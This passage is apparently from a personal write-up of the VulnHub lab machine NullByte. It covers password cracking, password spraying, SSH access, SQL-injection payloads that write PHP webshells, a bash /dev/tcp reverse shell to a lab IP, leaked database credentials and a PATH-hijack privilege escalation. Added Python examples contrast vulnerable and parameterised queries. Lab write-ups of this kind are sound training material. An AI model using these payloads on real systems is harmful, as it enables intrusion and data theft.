Progress.........: 12288/14344385 (0.09%)
Rejected.........: 0/12288 (0.00%)
Restore.Point....: 8192/14344385 (0.06%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: total90 -> hawkeye
Hardware.Mon.#1..: Util: 11%

I also found that the -a option had been wrong earlier: 3 is brute-force (mask) mode, while 0 is dictionary mode.

So the password is omega; save it.

Getting a foothold

Password spraying against the known services

With the cracked password and the two known users, the obvious next step is to try the password against the known services, i.e. the credentials:

root:omega
isis:omega
ramses:omega

SSH login eventually succeeds:

┌──(kali㉿kali)-[~/Desktop/redteamnotes_benchmark_1-20/vulnhub/Nullbyte]
└─$ ssh ramses@192.168.59.133 -p 777
ramses@192.168.59.133's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$ whoami
ramses

ramses@NullByte:~$ id
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)

(Supplement from the video) Getting a shell by manually writing a simple one-line webshell via MySQL file writes

The video also mentions another way to get a foothold. I had not given enough thought to the MySQL banner version: since 5.5.44-0+deb8u1 predates 5.7.6, MySQL's file read/write capability can also be used: 1" union select "<?php system($_GET['cvestone']); ?>",2,3 into outfile "/var/www/html/uploads/shell.php"; -- - Here uploads is the directory found earlier by directory brute-forcing: (screenshot 2024-06-19-16-19-48). Test whether the webshell file is reachable and can run a simple command: (screenshot 2024-06-19-16-22-26). Compared with the earlier method, though, the shell obtained this way has lower privileges. A webshell generated by a manager such as Godzilla could be used as well, but escaping has to be taken care of just the same.

Note that to run more commands this way, special characters must be URL-encoded first.

(Supplement from the video) Writing a larger webshell via MySQL file writes for a reverse shell

The shell obtained through the small webshell earlier is very limited in interactivity, so a larger one can be written instead: 1" union select "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/192.168.59.131/1234 0>&1'\"); ?>",2,3 into outfile "/var/www/html/uploads/revshell.php"; -- -

Analysis of this webshell:

Then start a listener on Kali:

sudo nc -lvnp 1234

Visiting the webshell then gives a reverse shell: (screenshot 2024-06-19-16-58-11)

Leaking the site source and database connection details from the unprivileged shell

Although the user obtained is not root, an ordinary user can still try to read the directory the website lives in:

ramses@NullByte:/var/www/html$ ls
index.html kzMb5nVYJw main.gif main.gif_original uploads
ramses@NullByte:/var/www/html$ cd kzMb5nVYJw/
ramses@NullByte:/var/www/html/kzMb5nVYJw$ ls
420search.php index.php
ramses@NullByte:/var/www/html/kzMb5nVYJw$ cat 420search.php
<?php
$word = $_GET["usrtosearch"];

$dbhost = 'localhost:3036';
$dbuser = 'root';
$dbpass = 'sunnyvale';
$conn = mysql_connect($dbhost, $dbuser, $dbpass);
if(! $conn )
{
die('Could not connect: ' . mysql_error());
}
$sql = 'SELECT id, user, position FROM users WHERE user LIKE "%'.$word.'%" ';

mysql_select_db('seth');
$retval = mysql_query( $sql, $conn );
if(! $retval )
{
die('Could not get data: ' . mysql_error());
}
while($row = mysql_fetch_array($retval, MYSQL_ASSOC))
{
echo "EMP ID :{$row['id']} <br> ".
"EMP NAME : {$row['user']} <br> ".
"EMP POSITION : {$row['position']} <br> ".
"--------------------------------<br>";
}
echo "Fetched data successfully\n";
mysql_close($conn);

?>

This leaks the database administrator credentials root:sunnyvale and the non-default MySQL port 3036.
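The source above also shows exactly why sqlmap succeeded: $word is concatenated straight into the SQL text. The added example below (mine, not the box's code) reproduces that query in Python over an in-memory SQLite table next to a parameterised version. It is an adaptation: SQLite uses single-quoted string literals and -- comments where the PHP used MySQL's double quotes and #, the table rows are constructed (the two user names are the ones sqlmap enumerated, isis's position is the one phpMyAdmin showed, and the other values are placeholders), and the tautology input is the textbook illustration rather than one of sqlmap's payloads.

```python
from __future__ import annotations
import sqlite3

# Added example, not the box's code: the concatenated query from 420search.php
# next to a parameterised version, run against an in-memory SQLite table.
# Adaptation: SQLite string literals are single-quoted and comments start with
# "--", where the PHP used MySQL's double quotes and "#".


def make_db() -> sqlite3.Connection:
    """Constructed users table: names as enumerated by sqlmap; isis's position is
    the one phpMyAdmin showed, the remaining values are placeholders."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, user TEXT, position TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "isis", "employee", "<placeholder-hash>"),
        (2, "ramses", "<placeholder-position>", "<placeholder-hash>"),
    ])
    return conn


def search_vulnerable(conn: sqlite3.Connection, word: str) -> list[tuple]:
    """Mirrors 420search.php: the value is spliced into the SQL text, so a quote
    inside it ends the literal and whatever follows is parsed as SQL."""
    sql = "SELECT id, user, position FROM users WHERE user LIKE '%" + word + "%'"
    return conn.execute(sql).fetchall()


def _escape_like(word: str) -> str:
    """Neutralise LIKE metacharacters so the caller cannot widen the match."""
    return word.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_hardened(conn: sqlite3.Connection, word: str) -> list[tuple]:
    """Parameter binding: the value is sent separately from the statement and is
    only ever compared as data. The wildcards are appended in SQL, not by the caller."""
    sql = "SELECT id, user, position FROM users WHERE user LIKE '%' || ? || '%' ESCAPE '\\'"
    return conn.execute(sql, (_escape_like(word),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    tautology = "x' OR 1=1 --"
    print(search_vulnerable(db, "ram"))       # one row
    print(search_vulnerable(db, tautology))   # every row: the WHERE clause became  user LIKE '%x' OR 1=1
    print(search_hardened(db, tautology))     # no rows: the whole string is just a search term
```

The same fix applies to the PHP: the deprecated mysql_* functions have no parameter binding at all, so the query belongs in a mysqli or PDO prepared statement with the search term bound as a parameter, and the web application should connect with a dedicated low-privilege account rather than root, which is what turned this one injection into full database access.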

Trying the password against root over SSH

It surely would not be this easy, but it is still worth trying, because even in real environments there are occasional cases where the database root password is the same as the host root password. The attempt failed.

Trying to log in to phpMyAdmin for more information

Logging in with the credentials above succeeds, and one fairly important hint shows up: (screenshot 2024-06-19-15-47-23). The isis user's position is employee, suggesting her privileges may be higher than those of ramses, but this information was also obtainable from the sqlmap run, so nothing new was found here.

Privilege escalation (parts not yet understood, to be studied)

find / -group ramses -type f 2>/dev/null | grep -v '/proc'   # exclude /proc (search by group ownership)
cd /var/www/backup
clear
export TERM=xterm-color
./procwatch
# I don't quite understand the next three steps
ln -s /bin/sh ps
export PATH=.:$PATH
./procwatch
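The last three commands turn on how a program finds an external command it runs by bare name (the writeup does not show procwatch's source, so that it invokes ps by bare name is an assumption here): the shell and execvp walk PATH in order and take the first executable called ps, so a directory the user can write to, placed at the front of PATH, wins over /bin. The added example below (mine, not from the writeup) reproduces that lookup over two constructed directories and shows the defensive counterpart: a privileged program resolving its helpers through a fixed path instead of the caller's PATH.

```python
from __future__ import annotations
import os
import stat
import tempfile

# Added example, not the writeup's code: PATH-order command resolution, the
# mechanism behind `ln -s /bin/sh ps` followed by `export PATH=.:$PATH`.


def resolve_command(name: str, search_path: list[str]) -> str | None:
    """First regular, executable file called `name` in search_path order (as execvp does)."""
    for directory in search_path:
        candidate = os.path.join(directory, name)
        try:
            st = os.stat(candidate)
        except FileNotFoundError:
            continue
        if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IXUSR:
            return candidate
    return None


def make_fixture() -> dict:
    """Constructed layout: `system_dir` stands in for /bin with the real ps, and
    `writable_dir` for a directory the unprivileged user controls (the writeup's
    /var/www/backup) that also contains an executable named ps."""
    root = tempfile.mkdtemp()
    dirs = {"system_dir": os.path.join(root, "bin"), "writable_dir": os.path.join(root, "backup")}
    for d in dirs.values():
        os.mkdir(d)
        path = os.path.join(d, "ps")
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho " + d + "\n")
        os.chmod(path, 0o755)
    dirs["system_ps"] = os.path.join(dirs["system_dir"], "ps")
    dirs["writable_ps"] = os.path.join(dirs["writable_dir"], "ps")
    return dirs


def compare_lookups(dirs: dict) -> dict:
    """Resolve 'ps' with a caller-controlled PATH and with a fixed one."""
    inherited_path = [dirs["writable_dir"], dirs["system_dir"]]   # what PATH=.:$PATH yields with cwd=backup
    fixed_path = [dirs["system_dir"]]                              # what a privileged program should use
    return {
        "inherited": resolve_command("ps", inherited_path),
        "fixed": resolve_command("ps", fixed_path),
    }


if __name__ == "__main__":
    fixture = make_fixture()
    print(compare_lookups(fixture))
```

The fix on the program side is to call helpers by absolute path, or to reset PATH to a fixed value before calling them; setuid programs in particular must never trust the environment they were started with, which is also why sudo's secure_path exists.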

Lessons learned

  • The need to verify by hand before running sqlmap

After watching the video I realised that guessing from the application logic that SQL injection existed and then running sqlmap straight away was not rigorous enough. One should test by hand first, confirming from the page response that the SQL statement really reaches the database, do a simple check for basic information such as the database version, and only then run the tool.

  • Do not rush to crack an encoded string; identify it properly first to reduce the cracking effort

In the video, given a mixed-case alphanumeric string (i.e. the hash I kept trying to crack above), first check whether it is base64; if the result of echo -n <string> | base64 -d looks like a hash value, run hash-identifier on that result to identify the hash algorithm.
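The decode-then-identify routine from the video, and the lesson just stated, as a single added Python example (mine, not from the writeup or the video): it restores the missing base64 padding that made base64 -d print "invalid input" in the section above, checks whether the decoded bytes look like a hexadecimal digest, guesses the family from the digest length the way hash-identifier did, and verifies a cracked candidate with hashlib instead of re-running john or hashcat. The length table is an assumption and only covers unsalted hex digests.

```python
from __future__ import annotations
import base64
import binascii
import hashlib
import re

# Added example, not the writeup's code: peel one base64 layer, recognise a hex
# digest, and verify a cracked candidate offline.

# Assumption: only unsalted hex digests of these lengths are recognised.
HEX_DIGEST_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


def decode_base64_lenient(value: str) -> bytes | None:
    """Decode base64 even when the trailing '=' padding was dropped, which is why
    `base64 -d` on the 43-character value decoded it and then complained."""
    value = value.strip()
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except binascii.Error:
        return None


def looks_like_hex_digest(text: str) -> bool:
    return bool(HEX_RE.match(text)) and len(text) in HEX_DIGEST_LENGTHS


def identify(value: str) -> dict:
    """Return {'base64': bool, 'hex': digest-or-None, 'candidates': [algorithms]}.
    Checks the raw value first, then one base64 layer underneath it."""
    if looks_like_hex_digest(value):
        return {"base64": False, "hex": value.lower(), "candidates": [HEX_DIGEST_LENGTHS[len(value)]]}
    raw = decode_base64_lenient(value)
    if raw is not None:
        try:
            inner = raw.decode("ascii")
        except UnicodeDecodeError:
            inner = ""
        if looks_like_hex_digest(inner):
            return {"base64": True, "hex": inner.lower(), "candidates": [HEX_DIGEST_LENGTHS[len(inner)]]}
    return {"base64": False, "hex": None, "candidates": []}


def verify_candidate(hexdigest: str, candidate: str, algorithm: str) -> bool:
    """Confirm a cracked password offline: hash the candidate and compare."""
    return hashlib.new(algorithm, candidate.encode()).hexdigest() == hexdigest.lower()


if __name__ == "__main__":
    result = identify("YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE")   # value dumped from the users table
    print(result)
    print(verify_candidate(result["hex"], "omega", result["candidates"][0]))
```

A 32-character hex string is also what NTLM, MD4 and LM-derived formats look like, so the length is only a hint; the verification step is what settles it, and it is also the quickest way to confirm a result before spending it on a login attempt.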